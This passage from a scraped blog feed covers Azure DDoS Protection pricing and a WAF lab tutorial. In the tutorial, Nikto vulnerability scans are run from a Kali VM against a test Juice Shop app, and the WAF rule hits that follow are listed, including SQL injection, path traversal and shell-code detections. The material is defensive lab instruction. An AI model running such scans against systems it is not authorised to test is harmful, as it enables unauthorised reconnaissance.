Once VNets are attached to the plan, resources within those VNets are protected.</LI> <LI>Public IP Addresses – These are the resources that are being protected by the DDoS Protection plan.</LI> </UL> <P>&nbsp;</P> <H2>Calculating Cost</H2> <P>&nbsp;</P> <P>It is always helpful to have a refresher for how to calculate costs before provisioning a DDoS Protection Plan and attaching it to VNets to start protecting resources.</P> <P>&nbsp;</P> <P>The first step in cost calculation is to understand how many public IP addresses are associated to each protected VNet. Of course, public IP addresses do not exist on private virtual networks, but for eligible resources they are associated to other resources which are attached to the VNet.</P> <P>&nbsp;</P> <P>Eligible public IP addresses include those attached to Application Gateways, Bastions, Load Balancers, Azure Firewalls, VPN Gateways, VMs, and virtual appliances. Unsupported resources include some PaaS services like API Management, Logic Apps, Event Hub, and App Service Environments.</P> <P>&nbsp;</P> <P>Some examples include:</P> <UL> <LI>An Azure Firewall has 3 public IP addresses (default is 1, but more can be added). The Azure Firewall subnet is part of a VNet which is associated with a DDoS Protection plan. This represents 3 protected IP addresses.</LI> <LI>A VM has a public IP address associated with its network interface. That network interface also has a private IP address in a VNet associated with a DDoS Protection plan. This represents 1 protected IP.</LI> <LI>An Azure Bastion instance has a public IP address, and the Bastion subnet is within a protected VNet. This represents 1 protected IP address.</LI> <LI>An Application Gateway v2 (with WAF of course) has 1 public IP address, and is configured to auto-scale to a maximum of 100 instances. The App Gateway subnet is in a VNet associated to the DDoS plan. 
This represents 1 protected IP.</LI> </UL> <P>&nbsp;</P> <P>An added benefit of the last scenario mentioned is that when Application Gateway with WAF is deployed in a DDoS protected VNet, there are no additional charges for WAF - you pay for the Application Gateway at the <A href="#" target="_blank">lower non-WAF rate</A>.</P> <P>&nbsp;</P> <P>Another key point to make is that billing is calculated hourly, not monthly. In other words, you can turn the service on for testing and pay only for what you use, not the whole month. For production deployments, it is best to leave the service active at all times due to its adaptive tuning.</P> <P>&nbsp;</P> <P>Now that you have a sense of what counts as a protected IP address, and you know what the charges are (~$3,000/month for up to 100 protected IPs plus $30/month for each IP over 100), let’s consider some simple examples:</P> <P>&nbsp;</P> <TABLE> <TBODY> <TR> <TD width="89"> <P>Tenants</P> </TD> <TD width="89"> <P>Plans Required</P> </TD> <TD width="89"> <P>Subscriptions</P> </TD> <TD width="89"> <P>VNets</P> </TD> <TD width="89"> <P>Protected IP Addresses</P> </TD> <TD width="89"> <P>Cost/month</P> </TD> <TD width="89"> <P>Math</P> </TD> </TR> <TR> <TD width="89"> <P>1</P> </TD> <TD width="89"> <P>1</P> </TD> <TD width="89"> <P>10</P> </TD> <TD width="89"> <P>50</P> </TD> <TD width="89"> <P>25</P> </TD> <TD width="89"> <P>$2944</P> </TD> <TD width="89"> <P>&nbsp;</P> </TD> </TR> <TR> <TD width="89"> <P>1</P> </TD> <TD width="89"> <P>1</P> </TD> <TD width="89"> <P>150</P> </TD> <TD width="89"> <P>400</P> </TD> <TD width="89"> <P>100</P> </TD> <TD width="89"> <P>$2944</P> </TD> <TD width="89"> <P>&nbsp;</P> </TD> </TR> <TR> <TD width="89"> <P>1</P> </TD> <TD width="89"> <P>1</P> </TD> <TD width="89"> <P>150</P> </TD> <TD width="89"> <P>400</P> </TD> <TD width="89"> <P>150</P> </TD> <TD width="89"> <P>$4444</P> </TD> <TD width="89"> <P>2944 + (30 x 50)</P> </TD> </TR> <TR> <TD width="89"> <P>2</P> </TD> <TD width="89"> 
<P>2</P> </TD> <TD width="89"> <P>100</P> </TD> <TD width="89"> <P>200</P> </TD> <TD width="89"> <P>100 (50 per tenant)</P> </TD> <TD width="89"> <P>$5888</P> </TD> <TD width="89"> <P>2944 x 2</P> </TD> </TR> <TR> <TD width="89"> <P>2</P> </TD> <TD width="89"> <P>2</P> </TD> <TD width="89"> <P>150</P> </TD> <TD width="89"> <P>300</P> </TD> <TD width="89"> <P>150 (125/25)</P> </TD> <TD width="89"> <P>$6638</P> </TD> <TD width="89"> <P>2944 + (2944 + (25 x 30))</P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>We hope this pricing change helps simplify the exercise of cost planning for a DDoS Protection Standard deployment.</P> Tue, 09 Feb 2021 18:22:08 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-simplified-pricing-for-azure-ddos-protection-standard/ba-p/2119336 Anthony_Roman 2021-02-09T18:22:08Z Part 2 - Reconnaissance Playbook: Azure WAF Security Protection and Detection Lab https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-2-reconnaissance-playbook-azure-waf-security-protection-and/ba-p/2030751 <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6">Tutorial: Reconnaissance Playbook</FONT></H2> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>The second tutorial in this four-part series for Azure WAF protection and detection lab is the reconnaissance playbook.&nbsp; The purpose of the Azure WAF security protection lab is to demonstrate <STRONG>Azure WAF</STRONG>'s capabilities in identifying and protecting against suspicious activities and potential attacks against your web applications. 
This playbook explains how to test Azure WAF's protections against a <STRONG>reconnaissance attack</STRONG> with emphasis on Azure WAF protection ruleset and logging capabilities.&nbsp; The lab does not include advanced application security concepts and is not intended to be a reference for application security testing as these areas are broader than the use cases demonstrated herein.</P> <P>&nbsp;</P> <P>This playbook demonstrates the web application protection capabilities of Azure WAF against a simulated reconnaissance (recon) attack from common, real-world, publicly available hacking and attack tools.</P> <P>&nbsp;</P> <P>In this tutorial you will:</P> <OL> <LI>Run web application vulnerability scan against the target <STRONG>OWASP Juice Shop</STRONG> web application directly and then scan the same instance of the web application published through Azure WAF</LI> <LI>Review the differences in the results of the two web application vulnerability scans</LI> <LI>Review the summarized logs in the WAF Workbook (<A title="Azure Monitor Workbook for WAF" href="#" target="_blank" rel="noopener">Azure Monitor Workbook for WAF</A>)</LI> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Prerequisites</H2> <P>&nbsp;</P> <P><A title="Setup an Azure WAF Attack Testing Lab" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-1-lab-setup-azure-web-application-firewall-security/ba-p/2030469" target="_blank" rel="noopener">A completed Azure WAF security lab setup</A></P> <P>&nbsp;</P> <UL> <LI>We recommend following the lab setup instructions as closely as possible. 
The closer your lab is to the suggested lab setup, the easier it will be to follow the Azure WAF testing procedures</LI> </UL> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Reconnaissance Attack</H2> <P>&nbsp;</P> <P>Before an attacker can exploit a vulnerability, they will typically spend time researching their target web application which involves collecting application specific data and analyzing it for potential vulnerabilities.&nbsp; One of the methods for collecting sensitive security data to identify potential vulnerabilities in a web application is to utilize <STRONG>web application security vulnerability scanners</STRONG>.&nbsp; These scanners can analyze an application’s response headers to identify potential vulnerabilities.&nbsp; Data collected with web application vulnerability scanners can reveal potential vulnerabilities that an attacker could then test, develop, and leverage for exploitation or exfiltration.&nbsp; Such reconnaissance activities also allow attackers to gain a thorough understanding and complete mapping of your application for later use.</P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Performing Reconnaissance with Web Application Vulnerability Scanner</H2> <P>&nbsp;</P> <P>One of the first things an attacker will attempt is to try and gain extensive understanding of the application components, framework, and the potential vulnerabilities in a target web application.&nbsp; The quickest, most common method of doing this is to use a commercial or an open source web application vulnerability scanner (also called security scanners) to run unauthenticated/unauthorized scans against a target.&nbsp; In this tutorial, you will run two web application vulnerability scans against the target web application</P> <P>&nbsp;</P> <OL> <LI><STRONG>First scan</STRONG> will point to the target web application directly</LI> <UL> <LI>URL: http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net</LI> </UL> <LI><STRONG>Second scan</STRONG> will point to the same target web 
application protected by Azure WAF on Application Gateway</LI> <UL> <LI>URL: <A href="#" target="_blank" rel="noopener">http://juiceshopthruwaf.com</A></LI> </UL> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Running Web Application Vulnerability Scan against the Target Application</H3> <P>&nbsp;</P> <P>To run the web application vulnerability scans, we will connect to the Kali VM with RDP.&nbsp; Once connected, we will use <A href="#" target="_blank" rel="noopener"><STRONG>Nikto</STRONG></A>, a versatile, command line open source web application vulnerability scanning tool which is bundled in the Kali Linux distro. &nbsp;When pointed to the target web application, Nikto will scan the application for common vulnerabilities and display the scan output in the terminal window for quick review.</P> <P>&nbsp;</P> <OL> <LI>Sign into the Kali Linux VM using your lab credentials</LI> <LI>Launch the web browser and ensure that you are able to access the OWASP Juice Shop website directly with URL http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net and also through WAF with URL <A href="#" target="_blank" rel="noopener">http://juiceshopthruwaf.com</A></LI> <LI>Launch two instances of <STRONG>Nikto</STRONG> Web Vulnerability Scanner.&nbsp; Click on <STRONG>Applications</STRONG> on the top left and then click <STRONG>Web Application Analysis --&gt; Web Vulnerability Scanners --&gt; Nikto</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609887818173.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244418i91B6B5066429C6E5/image-size/medium?v=v2&amp;px=400" role="button" title="Mohit_Kumar_0-1609887818173.png" alt="Mohit_Kumar_0-1609887818173.png" /></span></P> <P>&nbsp;</P> <OL start="4"> <LI>To initiate the scans, utilize the following commands.&nbsp; One in each of the open Nikto windows <OL 
class="lia-list-style-type-lower-alpha"> <LI><STRONG>nikto -h http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net</STRONG></LI> <LI><STRONG>nikto -h <A href="#" target="_blank" rel="noopener">http://juiceshopthruwaf.com</A></STRONG></LI> </OL> </LI> </OL> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tips</STRONG></FONT> <UL class="lia-list-style-type-disc"> <LI><FONT size="2">To display verbose output in Nikto, use the following command</FONT><BR /> <UL class="lia-list-style-type-circle"> <LI><FONT size="2">nikto -h <U>http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net</U> -Display V</FONT></LI> </UL> </LI> <LI><FONT size="2">To save Nikto output to a file to review later, use the following command</FONT><BR /> <UL class="lia-list-style-type-circle"> <LI><FONT size="2">nikto -h <U>http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net</U> -o ./juiceshopdirect.htm&nbsp;</FONT></LI> </UL> </LI> </UL> </LI> </UL> <P>&nbsp;</P> <H3><FONT size="3">Reviewing Web Application Vulnerability Scan Results</FONT></H3> <P>&nbsp;</P> <P>After the scans finish running, we can quickly review the results by looking at the highlighted lines in the figures below.</P> <P>&nbsp;</P> <OL> <LI>When going to the Juice Shop website directly, we see that the scanner sent <STRONG>7k+</STRONG> <STRONG>requests<SUP>1</SUP></STRONG> to the web server and as a result found <STRONG>2 errors</STRONG> and <STRONG>150+ items/issues</STRONG> which could then be used to develop further attack and exploitation scenarios</LI> </OL> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Figure 1 (Scan Start)</STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609888445044.png" style="width: 627px;"><img 
src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244419i2BC879A6A6154E75/image-dimensions/627x395?v=v2" width="627" height="395" role="button" title="Mohit_Kumar_0-1609888445044.png" alt="Mohit_Kumar_0-1609888445044.png" /></span></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Figure 2 (Scan End)</STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_2-1609796992288.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244011i8E5E9A77D218B7FB/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_2-1609796992288.png" alt="Mohit_Kumar_2-1609796992288.png" /></span></P> <P class="lia-indent-padding-left-30px"><FONT size="2"><FONT color="#FF0000"><STRONG>!</STRONG></FONT><STRONG> IMPORTANT</STRONG>: &nbsp;For the scenarios demonstrated in this document, OWASP Juice Shop application was running on HTTP port 3000.&nbsp; This is not the case when you use the Azure WAF Attack Testing Lab Deployment Template as it configures the application to run on port 80, 443 and assigns it a URL.&nbsp; For the lab tutorials, you will connect to the application on HTTP port 80 only.&nbsp; The URL for the application will be http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net.&nbsp; &lt;deployment guid&gt; is unique to every deployment</FONT></P> <P>&nbsp;</P> <OL start="2"> <LI>While scanning Juice Shop website through the Azure WAF, we see that the scanner made <STRONG>&gt;3x the number of</STRONG> <STRONG>requests<SUP>1</SUP></STRONG> when compared to scanning the website directly in Step 1 and still it <STRONG>did not find any errors</STRONG> to report.&nbsp; Similarly, this scan is only able to report <STRONG>&lt;1% of the number of items/issues</STRONG> for further investigation as compared to when scanning the website 
directly</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><STRONG style="font-family: inherit;"><SUP>1</SUP></STRONG><FONT size="2" style="font-family: inherit;"> Request count for http://owaspdirect-&lt;deployment guid&gt;.azurewebsites.net taken from baseline of scans for comparison</FONT></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609888844466.png" style="width: 627px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244420i0358066759AB0C54/image-dimensions/627x394?v=v2" width="627" height="394" role="button" title="Mohit_Kumar_0-1609888844466.png" alt="Mohit_Kumar_0-1609888844466.png" /></span></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <H4>&nbsp;</H4> <H2>Understanding What Happened</H2> <P>&nbsp;</P> <P>Upon reviewing the Nikto scan outputs, we see the pattern as shown in the below table.&nbsp; This clearly indicates that when going through the Azure WAF, the scanner is not as effective in assessing the web application and identifying potential vulnerabilities.</P> <P>&nbsp;</P> <TABLE border="1" width="99.86187845303867%"> <TBODY> <TR> <TD width="33.28729281767956%" height="57px"> <P><STRONG>Recon Scan Route</STRONG></P> </TD> <TD width="33.28729281767956%" height="57px"> <P class="lia-align-center"><STRONG>No. of Issues</STRONG></P> </TD> <TD width="33.28729281767956%" height="57px"> <P><STRONG>No. 
of Items for Investigation</STRONG></P> </TD> </TR> <TR> <TD width="33.28729281767956%" height="30px"> <P>Direct</P> </TD> <TD width="33.28729281767956%" height="30px" class="lia-align-center"> <P>2</P> </TD> <TD width="33.28729281767956%" height="30px" class="lia-align-center"> <P>167</P> </TD> </TR> <TR> <TD width="33.28729281767956%" height="30px"> <P>Through WAF</P> </TD> <TD width="33.28729281767956%" height="30px" class="lia-align-center"> <P>0</P> </TD> <TD width="33.28729281767956%" height="30px" class="lia-align-center"> <P>3</P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>Now let us use the <A title="Azure Monitor Workbook for WAF" href="#" target="_blank" rel="noopener">Azure Monitor Workbook for WAF</A> to understand how WAF handled traffic from the <STRONG>Nikto </STRONG>security scanner.&nbsp; This workbook visualizes security relevant WAF events across several filterable panels.&nbsp; <EM>It works with all WAF types, including Application Gateway, Front Door, and CDN, and can be filtered based on WAF type or a specific WAF instance.</EM></P> <P>&nbsp;</P> <P><A title="Deploy Azure Monitor Workbook for WAF" href="#" target="_blank" rel="noopener noopener noreferrer">Click here</A>&nbsp;to deploy&nbsp;<STRONG>Azure Monitor Workbook for WAF</STRONG>&nbsp;to your subscription in Azure.</P> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip</STRONG>:&nbsp; To understand what is happening when scan traffic destined for the Juice Shop application goes through the Azure WAF, you can also examine the log entries associated with <STRONG>ApplicationGatewayFirewallLog </STRONG>in the<STRONG> Azure Monitor</STRONG></FONT></LI> </UL> <P>&nbsp;</P> <P>&nbsp;</P> <H3>Reviewing WAF logs in the Workbook</H3> <P>&nbsp;</P> <OL> <LI>You can access the WAF workbook by going into the Workbook blade and then selecting the WAF workbook deployed for this lab.&nbsp; Once in the workbook, ensure that you have selected the appropriate 
<STRONG>Time Range</STRONG>, <STRONG>WAF Type and WAF Items </STRONG>in the event filters</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1610145342692.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244984i68DFC89B9DCDB226/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1610145342692.png" alt="Mohit_Kumar_0-1610145342692.png" /></span></P> <P>&nbsp;</P> <OL start="2"> <LI>You should also ensure that you have selected the correct public IP address for your attacker machine (Kali VM) in the <STRONG>Top 10 Attacking IP Addresses,</STRONG><STRONG> filter to single IP address </STRONG>pane<STRONG>. </STRONG></LI> </OL> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip</STRONG>:&nbsp; If you are using the <SPAN>Azure WAF Attack Testing Lab Environment Deployment Template</SPAN> and have followed the lab setup instructions, then the client IP address will be the public IP address of the Azure Firewall in your demo environment</FONT></LI> </UL> <P><STRONG>&nbsp;</STRONG></P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1609889556104.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244422iFF4C8DBC9A66E9D1/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_1-1609889556104.png" alt="Mohit_Kumar_1-1609889556104.png" /></span></P> <P>&nbsp;</P> <OL start="3"> <LI>After selecting the correct client IP, we scroll back up to the top of the WAF Workbook and review the visualizations there.&nbsp; The sections of the workbook we will be using here are highlighted with <SPAN>alphabetized&nbsp;</SPAN>callouts in the figure below and map to the following sections:</LI> </OL> 
<P>&nbsp;</P> <P class="lia-indent-padding-left-60px">a. WAF actions filter</P> <P class="lia-indent-padding-left-60px">b. Top 40 Blocked Request URI addresses, filter to single URI address</P> <P class="lia-indent-padding-left-60px">c. Top 50 event trigger, filter by rule name</P> <P class="lia-indent-padding-left-60px">d. Message, full details</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609963440098.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244600iC07B01CB2710FFFA/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609963440098.png" alt="Mohit_Kumar_0-1609963440098.png" /></span></P> <DIV id="tinyMceEditorMohit_Kumar_2" class="mceNonEditable lia-copypaste-placeholder">&nbsp;</DIV> <P>&nbsp;</P> <H3>Overview of the Workbook sections</H3> <P>&nbsp;</P> <OL class="lia-list-style-type-lower-alpha"> <LI>Starting from the top, the <STRONG>WAF actions filter </STRONG>shows the number of matches and the blocked requests</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_3-1609797570523.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244021iB3265F9696090B44/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_3-1609797570523.png" alt="Mohit_Kumar_3-1609797570523.png" /></span></P> <P>&nbsp;</P> <OL class="lia-list-style-type-lower-alpha" start="2"> <LI>We can then look at the <STRONG>Top 40 Blocked Request URI addresses, filter to single URI address </STRONG>to identify the top URIs for which requests were blocked by WAF</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_4-1609797610173.png" style="width: 
999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244022i47A3A89DC0C3673D/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_4-1609797610173.png" alt="Mohit_Kumar_4-1609797610173.png" /></span></P> <P>&nbsp;</P> <OL class="lia-list-style-type-lower-alpha" start="3"> <LI>The <STRONG>Top 50 event trigger, filter by rule name </STRONG>shows all the rules which evaluated the scanner traffic</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_5-1609797663262.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244023iBF0DD58B23B1C549/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_5-1609797663262.png" alt="Mohit_Kumar_5-1609797663262.png" /></span></P> <P>&nbsp;</P> <UL> <LI>The below table shows an extract of the <STRONG>Top 50 event trigger, filter by rule name </STRONG>output for scanner traffic.&nbsp; This data clearly shows that WAF was able to detect the security scanner and blocked suspicious requests/payloads from the Nikto Scanner.&nbsp; This is expected because a security scanner will attempt to perform various types of operations to test security of the web application</LI> </UL> <P>&nbsp;</P> <TABLE> <TBODY> <TR> <TD width="597px" height="30px"> <P><STRONG>Rule</STRONG></P> </TD> <TD width="126px" height="30px"> <P><STRONG>count_</STRONG></P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Found User-Agent associated with security scanner</P> </TD> <TD width="126px" height="30px"> <P>8906</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Request Missing an Accept Header</P> </TD> <TD width="126px" height="30px"> <P>8906</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>GET or HEAD Request with Body Content.</P> </TD> <TD width="126px" height="30px"> <P>8860</P> </TD> </TR> <TR> <TD width="597px" height="30px"> 
<P>Node-Validator Blacklist Keywords</P> </TD> <TD width="126px" height="30px"> <P>4553</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>SQL Injection Attack: Common Injection Testing Detected</P> </TD> <TD width="126px" height="30px"> <P>3354</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Found request filename/argument associated with security scanner</P> </TD> <TD width="126px" height="30px"> <P>2422</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link</P> </TD> <TD width="126px" height="30px"> <P>2418</P> </TD> </TR> <TR> <TD width="597px" height="57px"> <P>Possible Remote File Inclusion (RFI) Attack: URL Payload Used w/Trailing Question Mark Character (?)</P> </TD> <TD width="126px" height="57px"> <P>2355</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Detects basic SQL authentication bypass attempts 2/3</P> </TD> <TD width="126px" height="30px"> <P>2249</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Detects MySQL comments, conditions and ch(a)r injections</P> </TD> <TD width="126px" height="30px"> <P>2233</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Path Traversal Attack (/../)</P> </TD> <TD width="126px" height="30px"> <P>1698</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>OS File Access Attempt</P> </TD> <TD width="126px" height="30px"> <P>699</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Remote Command Execution: Unix Shell Code Found</P> </TD> <TD width="126px" height="30px"> <P>682</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>XSS Attack Detected via libinjection</P> </TD> <TD width="126px" height="30px"> <P>667</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>SQL Injection Attack: SQL Tautology Detected.</P> </TD> <TD width="126px" height="30px"> <P>641</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Possible XSS Attack Detected - HTML Tag Handler</P> </TD> <TD width="126px" 
height="30px"> <P>616</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>XSS Filter - Category 1: Script Tag Vector</P> </TD> <TD width="126px" height="30px"> <P>616</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>NoScript XSS InjectionChecker: HTML Injection</P> </TD> <TD width="126px" height="30px"> <P>616</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Detects classic SQL injection probings 2/3</P> </TD> <TD width="126px" height="30px"> <P>455</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Invalid character in request (non printable characters)</P> </TD> <TD width="126px" height="30px"> <P>342</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Invalid character in request (null character)</P> </TD> <TD width="126px" height="30px"> <P>340</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>SQL Injection Attack</P> </TD> <TD width="126px" height="30px"> <P>272</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Remote Command Execution: Unix Command Injection</P> </TD> <TD width="126px" height="30px"> <P>199</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>SQL Comment Sequence Detected.</P> </TD> <TD width="126px" height="30px"> <P>197</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>URL file extension is restricted by policy</P> </TD> <TD width="126px" height="30px"> <P>192</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>Restricted File Access Attempt</P> </TD> <TD width="126px" height="30px"> <P>178</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>SQL Hex Encoding Identified</P> </TD> <TD width="126px" height="30px"> <P>147</P> </TD> </TR> <TR> <TD width="597px" height="57px"> <P>Possible Remote File Inclusion (RFI) Attack: Common RFI Vulnerable Parameter Name used w/URL Payload</P> </TD> <TD width="126px" height="57px"> <P>136</P> </TD> </TR> <TR> <TD width="597px" height="30px"> <P>PHP Injection Attack: High-Risk PHP Function Call Found</P> </TD> <TD width="126px" height="30px"> 
<P>128</P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <OL class="lia-list-style-type-lower-alpha" start="4"> <LI>Review further details in the <STRONG>Message, full details </STRONG>section</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609890153348.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244426i3C23069AC845EB5A/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609890153348.png" alt="Mohit_Kumar_0-1609890153348.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Key Takeaway</H2> <P>&nbsp;</P> <P>Using security scanners to perform web application vulnerability assessment scans to expose vulnerabilities in a target web application is a common technique used by attackers.&nbsp; When external adversaries can perform these scans against your web applications, they are able to learn about your application design and its vulnerabilities which could potentially lead to exploitation.&nbsp;</P> <P>&nbsp;</P> <P><STRONG>For web applications secured with it, Azure WAF can detect and protect against reconnaissance attacks executed with security scanners at the network edge, with its out of the box ruleset.</STRONG></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <TABLE border="1" width="100%"> <TBODY> <TR> <TD width="50%"> <H4>Previous:&nbsp;<A title="Setup an Azure WAF Attack Testing Lab" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-1-lab-setup-azure-web-application-firewall-security/ba-p/2030469" target="_blank" rel="noopener">Setup an Azure WAF Attack Testing Lab</A>&nbsp;</H4> </TD> <TD width="50%"> <H4>Next:&nbsp;<A title="Vulnerability Exploitation Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-3-vulnerability-exploitation-playbook-azure-waf-security/ba-p/2031047" target="_blank" rel="noopener">Vulnerability 
Exploitation Playbook</A></H4> </TD> </TR> </TBODY> </TABLE> <H4>&nbsp;</H4> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> Fri, 15 Jan 2021 02:00:34 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-2-reconnaissance-playbook-azure-waf-security-protection-and/ba-p/2030751 Mohit_Kumar 2021-01-15T02:00:34Z Part 3 - Vulnerability Exploitation Playbook: Azure WAF Security Protection and Detection Lab https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-3-vulnerability-exploitation-playbook-azure-waf-security/ba-p/2031047 <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6">Tutorial: Vulnerability Exploitation Playbook</FONT></H2> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>Vulnerability Exploitation playbook is third in the four-part tutorial series for the Azure WAF protection and detection lab.&nbsp; The purpose of the Azure WAF security protection lab is to demonstrate <STRONG>Azure WAF</STRONG>'s capabilities in identifying and protecting against suspicious activities and potential attacks against your web applications.&nbsp; This playbook explains how to test Azure WAF's protections against a <STRONG>Cross Site Scripting (XSS)</STRONG> <STRONG>attack</STRONG> with emphasis on Azure WAF protection ruleset and logging capabilities.&nbsp; The lab does not include advanced application security concepts and is not intended to be a reference for application security testing as these areas are broader than the use cases demonstrated herein.</P> <P>&nbsp;</P> <P>This playbook demonstrates the protection capabilities of Azure WAF against a simulated <STRONG>Server Side</STRONG> <STRONG>XSS injection (Stored XSS)</STRONG> attack from common, real-world, publicly available hacking and attack tools.</P> <P>&nbsp;</P> <P>In this tutorial you will:</P> <OL> <LI>Simulate Cross Site Scripting (XSS) attack against the target OWASP Juice Shop application directly and then attack the same instance of the web application published 
